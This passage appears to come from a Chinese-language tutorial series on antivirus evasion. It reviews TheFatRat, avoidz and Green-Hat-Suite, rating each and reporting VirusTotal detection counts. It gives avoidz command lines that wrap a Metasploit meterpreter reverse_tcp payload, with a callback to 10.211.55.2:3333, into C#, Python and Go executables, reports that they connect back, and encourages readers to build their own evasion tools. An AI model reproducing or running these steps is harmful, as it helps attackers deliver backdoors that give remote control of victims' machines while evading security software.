使用 TheFatRat 编译 C#+powershell 生成 exe,virustotal.com 中 37/71 个报毒
TheFatRat 的很多免杀方式是借助于 msfvenom 编码、upx 等加壳压缩、c/c# 编译等将 powershell 混淆后编译成 exe 或 bat 文件,但有些在执行时还是会调用 powershell,而 powershell 的调用已经被各大杀软盯的很紧了,所以查杀效果只能算是一般了。
3.7 Avoidz 免杀 (VT 免杀率 23/71)操作便利★★
免杀效果★★★
推荐指数★★★
详细文章链接:https://mp.weixin.qq.com/s/TnfTXihlyv696uCiv3aWfg
avoidz 是一个比较使用比较简单的小工具,利用 msf 生成 powershell 的 shellocde,然后利用 c#、python、go、ruby 等语言对 shellcode 进行编译生成 exe 而达到免杀的效果,套路比较简单,静态检测查杀率还算可以,但行为检测就很容易被查杀出来,和 TheFatRat 具有相同的缺陷。倒是可以借鉴下他的原理,自己写个免杀工具。
使用 avoidz 编译 C# 生成 exe(VT 免杀率 23/68)
提供 3 种 C 代码编译成 exe 的方式,想了解详情的可以 cat avoidz.rb 查看具体区别。
我以第一种为例进行测试
./avoidz.rb -h 10.211.55.2 -p 3333 -m windows/meterpreter/reverse_tcp -f c1
执行后可正常上线。开启杀软进行测试,静态测试没问题,行为检测马上露馅。
virustotal.com 中 23/68 个报毒
使用 avoidz 编译 python 生成 exe(VT 免杀率 11/68)
使用 python 生成 exe 文件
./avoidz.rb -h 10.211.55.2 -p 3333 -m windows/meterpreter/reverse_tcp -f py静态查杀没问题,行为检测依旧被拦
virustotal.com 中 11/68 个报毒
使用 avoidz 编译 golang 生成 exe(VT 免杀率 23/71)
使用 go 生成 exe 文件
./avoidz.rb -h 10.211.55.2 -p 3333 -m windows/meterpreter/reverse_tcp -f gogo 版本的静态查杀都没通过,行为检测依据被拦
virustotal.com 中 23/71 个报毒
3.8 Green-Hat-Suite 免杀 (VT 免杀率 23/70)
操作便利★★★★
免杀效果★★★★
推荐指数★★★★
详细文章链接:https://mp.weixin.qq.com/s/MVJTXOIqjgL7iEHrnq6OJg
Green-Hat-Suite 是国内大佬 Green-m 的大作,Green-m 大佬在 freebuf 和自己博客上 https://green-m.me/写了很多免杀相关的文章,开始的几篇文章里面有一些知识点就是从他那学到的,而且 msfvenom 命令自动补全脚本也是出自他之手,之前有的知识点写的不太准备大佬也热情的给予指正,万分感谢!
Green-Hat-Suite 也是和 msf 无缝对接的免杀工具,使用 ruby 开发,可在 linux/windows 上安装,使用非常简单,虽然已经接近两年没有更新了,但目前来看免杀效果仍然很不错。
virustotal.com 中 23/70 个报毒